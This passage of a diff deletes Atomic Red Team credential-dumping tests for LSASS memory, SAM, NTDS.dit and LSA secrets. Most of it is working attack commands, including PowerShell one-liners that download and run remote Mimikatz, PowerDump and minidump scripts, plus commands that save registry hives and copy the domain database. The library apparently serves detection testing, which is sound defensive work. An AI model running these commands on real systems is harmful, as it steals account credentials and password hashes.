IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: |
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Create Mini Dump of LSASS.exe using ProcDump
auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: Path
default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
dependency_executor_name: powershell
dependencies:
- description: |
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
prereq_command: |
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
executor:
command: |
#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
cleanup_command: |
del "#{output_file}" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Powershell Mimikatz
auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
description: |
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
supported_platforms:
- windows
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
name: powershell
elevation_required: true
- name: Dump LSASS with .Net 5 createdump.exe
auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
description: |
This test uses the technique describe in this tweet
(https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\dotnet-lsass.dmp
createdump_exe:
description: Path of createdump.exe executable
type: Path
default: 'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe'
dependency_executor_name: powershell
dependencies:
- description: |
Computer must have createdump.exe from .Net 5
prereq_command: |
if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
get_prereq_command: |
echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
executor:
command: |
echo "Createdump Path #{createdump_exe}"
$LSASS = tasklist | findstr "lsass"
$FIELDS = $LSASS -split "\s+"
$ID = $FIELDS[1]
& "#{createdump_exe}" -u -f #{output_file} $ID
cleanup_command: |
del #{output_file}
name: powershell
elevation_required: true
- name: Dump LSASS.exe using imported Microsoft DLLs
auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
supported_platforms:
- windows
input_arguments:
xordump_exe:
description: Path to xordump
type: Path
default: C:\Windows\Temp\xordump.exe
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp
dependencies:
- description: |
Computer must have xordump.exe
prereq_command: |
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
executor:
command: |
#{xordump_exe} -out #{output_file} -x 0x41
cleanup_command: |
Remove-Item ${output_file} -ErrorAction Ignore
name: powershell
elevation_required: true
atomics/T1003.002/T1003.002.md
-207
View File
@@ -1,207 +0,0 @@
# T1003.002 - Security Account Manager
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/002)
<blockquote>Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* <code>reg save HKLM\sam sam</code>
* <code>reg save HKLM\system system</code>
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Registry dump of SAM, creds, and secrets](#atomic-test-1---registry-dump-of-sam-creds-and-secrets)
- [Atomic Test #2 - Registry parse with pypykatz](#atomic-test-2---registry-parse-with-pypykatz)
- [Atomic Test #3 - esentutl.exe SAM copy](#atomic-test-3---esentutlexe-sam-copy)
- [Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames](#atomic-test-4---powerdump-registry-dump-of-sam-for-hashes-and-usernames)
<br/>
## Atomic Test #1 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
```
#### Cleanup Commands:
```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```
<br/>
<br/>
## Atomic Test #2 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials
**Supported Platforms:** Windows
**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
pypykatz live registry
```
#### Dependencies: Run with `command_prompt`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
pip install pypykatz
```
<br/>
<br/>
## Atomic Test #3 - esentutl.exe SAM copy
Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
**Supported Platforms:** Windows
**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM|
| file_name | Name of the copied file | String | SAM|
| copy_dest | Destination of the copied file | String | %temp%|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
```
#### Cleanup Commands:
```cmd
del #{copy_dest}\#{file_name} >nul 2>&1
```
<br/>
<br/>
## Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames
Executes a hashdump by reading the hasshes from the registry.
**Supported Platforms:** Windows
**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
```
<br/>
atomics/T1003.002/T1003.002.yaml
-101
View File
@@ -1,101 +0,0 @@
attack_technique: T1003.002
display_name: "OS Credential Dumping: Security Account Manager"
atomic_tests:
- name: Registry dump of SAM, creds, and secrets
auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44
description: |
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
supported_platforms:
- windows
executor:
command: |
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
cleanup_command: |
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
name: command_prompt
elevation_required: true
- name: Registry parse with pypykatz
auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
description: |
Parses registry hives to obtain stored credentials
supported_platforms:
- windows
dependency_executor_name: command_prompt
dependencies:
- description: |
Computer must have python 3 installed
prereq_command: |
py -3 --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
echo "Python 3 must be installed manually"
- description: |
Computer must have pip installed
prereq_command: |
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
echo "PIP must be installed manually"
- description: |
pypykatz must be installed and part of PATH
prereq_command: |
pypykatz -h >nul 2>&1
exit /b %errorlevel%
get_prereq_command: |
pip install pypykatz
executor:
command: |
pypykatz live registry
name: command_prompt
elevation_required: true
- name: esentutl.exe SAM copy
auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480
description: |
Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
supported_platforms:
- windows
input_arguments:
file_path:
description: Path to the file to copy
type: Path
default: '%SystemRoot%/system32/config/SAM'
file_name:
description: Name of the copied file
type: String
default: SAM
copy_dest:
description: Destination of the copied file
type: String
default: '%temp%'
executor:
command: |
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
name: command_prompt
elevation_required: true
cleanup_command: |
del #{copy_dest}\#{file_name} >nul 2>&1
- name: PowerDump Registry dump of SAM for hashes and usernames
auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
description: Executes a hashdump by reading the hasshes from the registry.
supported_platforms:
- windows
executor:
command: |-
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
Import-Module "$Env:Temp\PowerDump.ps1"
Invoke-PowerDump
name: powershell
elevation_required: true
atomics/T1003.003/T1003.003.md
-329
View File
@@ -1,329 +0,0 @@
# T1003.003 - NTDS
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/003)
<blockquote>Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Create Volume Shadow Copy with vssadmin](#atomic-test-1---create-volume-shadow-copy-with-vssadmin)
- [Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-2---copy-ntdsdit-from-volume-shadow-copy)
- [Atomic Test #3 - Dump Active Directory Database with NTDSUtil](#atomic-test-3---dump-active-directory-database-with-ntdsutil)
- [Atomic Test #4 - Create Volume Shadow Copy with WMI](#atomic-test-4---create-volume-shadow-copy-with-wmi)
- [Atomic Test #5 - Create Volume Shadow Copy with Powershell](#atomic-test-5---create-volume-shadow-copy-with-powershell)
- [Atomic Test #6 - Create Symlink to Volume Shadow Copy](#atomic-test-6---create-symlink-to-volume-shadow-copy)
<br/>
## Atomic Test #1 - Create Volume Shadow Copy with vssadmin
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe create shadow /for=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
<br/>
<br/>
## Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
**Supported Platforms:** Windows
**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vsc_name | Name of Volume Shadow Copy | String | &#92;&#92;?&#92;GLOBALROOT&#92;Device&#92;HarddiskVolumeShadowCopy1|
| extract_path | Path for extracted NTDS.dit | Path | C:&#92;Windows&#92;Temp|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
```
#### Cleanup Commands:
```cmd
del "#{extract_path}\ntds.dit" >nul 2> nul
del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
##### Description: Volume shadow copy must exist
##### Check Prereq Commands:
```cmd
if not exist #{vsc_name} (exit /b 1)
```
##### Get Prereq Commands:
```cmd
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vassadmin'" to fulfuill this requirement
```
##### Description: Extract path must exist
##### Check Prereq Commands:
```cmd
if not exist #{extract_path} (exit /b 1)
```
##### Get Prereq Commands:
```cmd
mkdir #{extract_path}
```
<br/>
<br/>
## Atomic Test #3 - Dump Active Directory Database with NTDSUtil
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;ntds_T1003|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
```
#### Cleanup Commands:
```cmd
rmdir /q /s #{output_folder} >nul 2>&1
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
<br/>
<br/>
## Atomic Test #4 - Create Volume Shadow Copy with WMI
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic shadowcopy call create Volume=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
<br/>
<br/>
## Atomic Test #5 - Create Volume Shadow Copy with Powershell
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')
```
<br/>
<br/>
## Atomic Test #6 - Create Symlink to Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
| symlink_path | symlink path | String | C:&#92;Temp&#92;vssstore|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
```
<br/>
atomics/T1003.003/T1003.003.yaml
-182
View File
@@ -1,182 +0,0 @@
attack_technique: T1003.003
display_name: "OS Credential Dumping: NTDS"
atomic_tests:
- name: Create Volume Shadow Copy with vssadmin
auto_generated_guid: dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
description: |
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
supported_platforms:
- windows
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
default: 'C:'
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
executor:
command: |
vssadmin.exe create shadow /for=#{drive_letter}
name: command_prompt
elevation_required: true
- name: Copy NTDS.dit from Volume Shadow Copy
auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03
description: |
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
supported_platforms:
- windows
input_arguments:
vsc_name:
description: Name of Volume Shadow Copy
type: String
default: '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1'
extract_path:
description: Path for extracted NTDS.dit
type: Path
default: C:\Windows\Temp
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
- description: |
Volume shadow copy must exist
prereq_command: |
if not exist #{vsc_name} (exit /b 1)
get_prereq_command: |
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vassadmin'" to fulfuill this requirement
- description: |
Extract path must exist
prereq_command: |
if not exist #{extract_path} (exit /b 1)
get_prereq_command: |
mkdir #{extract_path}
executor:
command: |
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
cleanup_command: |
del "#{extract_path}\ntds.dit" >nul 2> nul
del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump Active Directory Database with NTDSUtil
auto_generated_guid: 2364e33d-ceab-4641-8468-bfb1d7cc2723
description: |
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
supported_platforms:
- windows
input_arguments:
output_folder:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\ntds_T1003
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
executor:
command: |
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
cleanup_command: |
rmdir /q /s #{output_folder} >nul 2>&1
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy with WMI
auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da
description: |
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
supported_platforms:
- windows
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
default: 'C:'
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
executor:
command: |
wmic shadowcopy call create Volume=#{drive_letter}
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy with Powershell
auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
description: |
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
supported_platforms:
- windows
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
default: 'C:'
executor:
command: |
(gwmi -list win32_shadowcopy).Create(#{drive_letter},'ClientAccessible')
name: powershell
elevation_required: true
- name: Create Symlink to Volume Shadow Copy
auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702
description: |
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
supported_platforms:
- windows
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
default: 'C:'
symlink_path:
description: symlink path
type: String
default: 'C:\Temp\vssstore'
executor:
command: |
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
name: command_prompt
elevation_required: true
atomics/T1003.004/T1003.004.md
-66
View File
@@ -1,66 +0,0 @@
# T1003.004 - LSA Secrets
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/004)
<blockquote>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Dumping LSA Secrets](#atomic-test-1---dumping-lsa-secrets)
<br/>
## Atomic Test #1 - Dumping LSA Secrets
Dump secrets key from Windows registry
When successful, the dumped file will be written to $env:Temp\secrets.
Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.
https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
**Supported Platforms:** Windows
**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| psexec_exe | Path to PsExec executable | Path | PathToAtomicsFolder&#92;T1003.004&#92;bin&#92;PsExec.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets
```
#### Cleanup Commands:
```cmd
del %temp%\secrets >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PSTools.zip"
Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force
New-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null
Copy-Item $env:TEMP\PSTools\PsExec.exe #{psexec_exe} -Force
```
<br/>
atomics/T1003.004/T1003.004.yaml
-31
View File
@@ -1,31 +0,0 @@
attack_technique: T1003.004
display_name: "OS Credential Dumping: LSA Secrets"
atomic_tests:
- name: Dumping LSA Secrets
auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f
description: |
Dump secrets key from Windows registry
When successful, the dumped file will be written to $env:Temp\secrets.
Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.
https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
supported_platforms:
- windows
input_arguments:
psexec_exe:
description: Path to PsExec executable
type: Path
default: PathToAtomicsFolder\T1003.004\bin\PsExec.exe
dependency_executor_name: powershell
dependencies:
- description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
prereq_command: 'if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}'
get_prereq_command: |-
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PSTools.zip"
Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force
New-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null
Copy-Item $env:TEMP\PSTools\PsExec.exe #{psexec_exe} -Force
executor:
command: '#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets'
cleanup_command: del %temp%\secrets >nul 2> nul
name: command_prompt
elevation_required: true
atomics/T1003.006/T1003.006.md
-68
View File
@@ -1,68 +0,0 @@
# T1003.006 - DCSync
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/006)
